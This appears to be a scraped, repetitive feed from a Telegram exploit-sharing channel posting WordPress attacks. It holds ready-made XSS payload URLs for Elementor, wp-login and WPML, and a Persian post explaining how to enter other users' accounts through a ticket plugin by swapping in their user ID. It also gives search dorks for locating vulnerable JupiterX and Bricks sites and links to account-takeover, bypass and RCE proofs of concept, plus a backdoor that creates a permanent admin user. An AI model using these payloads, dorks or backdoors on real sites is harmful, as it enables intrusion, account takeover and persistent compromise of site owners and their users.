Collection of Wordpress Exploits and CVES.
Github
#Wordpress #Exploit #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Wordpress #Exploit #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡2👎2
Wordpress - XSS ( CVE-2022-29455)
/wp-content/plugins/elementor/assets/js/frontend.min.js
usage:
#wordpress #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
/wp-content/plugins/elementor/assets/js/frontend.min.js
usage:
https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==#wordpress #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥10❤🔥1👍1
Exploiting the xmlrpc.php on all WordPress versions
Read Here
#Exploit #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
Read Here
#Exploit #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥4👍1
در نسخه جدید پلاگین ژاکت:
zhaket.com/web/wp-advanced-support-ticket
باگی وجود داره که میتونید از طریق این پلاگین خیلی ساده به پنل افراد دیگه دسترسی داشته باشید.
site.ir/my-account/tickets/?sss=t&ddd=1
پیلود تست شده :
https://site.ir/my-account/tickets/?action=view&ticket-id=22%3Cscript%3Ealert(1)%3C/script%3E
بجای عدد 1، ایدی عددی یوزر مورد نظرو بزنید. خودکار لاگین میشید.
site.ir/my-account/tickets/?sss=t&ddd=1
#XSS #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
zhaket.com/web/wp-advanced-support-ticket
باگی وجود داره که میتونید از طریق این پلاگین خیلی ساده به پنل افراد دیگه دسترسی داشته باشید.
site.ir/my-account/tickets/?sss=t&ddd=1
پیلود تست شده :
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
پیلود تست شده :https://site.ir/my-account/tickets/?action=view&ticket-id=22%3Cscript%3Ealert(1)%3C/script%3E
بجای عدد 1، ایدی عددی یوزر مورد نظرو بزنید. خودکار لاگین میشید.
site.ir/my-account/tickets/?sss=t&ddd=1
#XSS #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
✍6👍3⚡1
wordpress login page allow un-auth cross site scripting (xss)
Payload :
#xss #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
%22%20accesskey%3dx%20onclick%3dalert(1)%2f%2f#xss #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥14👎4⚡1👍1
WordPress Plugin WPML Version < 4.6.1 RXSS vulnerability
Nuclei template: Github
Payload :
——————
0Day.Today
@LearnExploit
@Tech_Army
Nuclei template: Github
Payload :
https://xxxxxxx/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0c
#Wordpress #0day #xss——————
0Day.Today
@LearnExploit
@Tech_Army
👎4🔥3🤝1
CVE-2023-2982
WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass
Github
#bypass #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass
Github
#bypass #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9👎3
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
inurl: wp-content/plugins/jupiterx-core/
Shared By XP4➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
⚡5👍2❤🔥1👏1😁1
CVE-2023-38389-@LearnExploit.rar
726.6 KB
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
Shared By XP4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
inurl: wp-content/plugins/jupiterx-core/
نکته: با پایتون 2.7 اجرا کنید در غیر این صورت با اررور مواجه میشید.Shared By XP4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
⚡6👍5❤1
CVE-2023-37988 - Wordpress/Plugin - Contact Form Generator [RXSS]
Github
#CVE #Wordpress #RXSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Wordpress #RXSS
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3
بکدور ساخت یوزر ادمین با دسترسی دائم
Link File
#backdoor #wordpress
imem!
——————
0Day.Today
@LearnExploit
@Tech_Army
Link File
#backdoor #wordpress
imem!
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡11❤2🔥2
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥3❤1⚡1
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡8❤🔥3🔥3👍1